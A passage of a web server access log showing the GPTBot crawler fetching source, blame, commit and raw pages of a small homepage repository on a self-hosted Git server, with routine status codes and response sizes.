compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" -[17/Feb/2026:13:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" -[17/Feb/2026:13:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" -[17/Feb/2026:13:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" -[17/Feb/2026:13:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:13:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 10826] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" -[17/Feb/2026:13:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 10777] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" -[17/Feb/2026:13:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" -[17/Feb/2026:13:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" -[17/Feb/2026:13:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 11205] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" -[17/Feb/2026:13:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" -[17/Feb/2026:13:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" -[17/Feb/2026:13:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 74.7.227.38] [Length 10523] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" -[17/Feb/2026:13:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" -[17/Feb/2026:13:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 12808] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:13:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 74.7.227.38] [Length 10171] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" -[17/Feb/2026:13:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 7733853] [Gzip 11.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:04:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" [Client 74.7.227.38] [Length 10769] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 11050] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 10855] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 10856] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10908] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 15588] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" -[17/Feb/2026:13:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" [Client 74.7.227.38] [Length 10418] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" -[17/Feb/2026:13:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 10698] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" -[17/Feb/2026:13:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" -[17/Feb/2026:13:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 8206005] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" -[17/Feb/2026:13:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 1094877] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" -[17/Feb/2026:13:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 14447] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:13:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 17063] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:13:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 10510] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:13:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 11048] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18354] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:13:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:13:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10839] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 12766] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" -[17/Feb/2026:13:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 74.7.227.38] [Length 9918] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 74.7.227.38] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 10058] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 11607] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 10313] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:13:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 10487] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 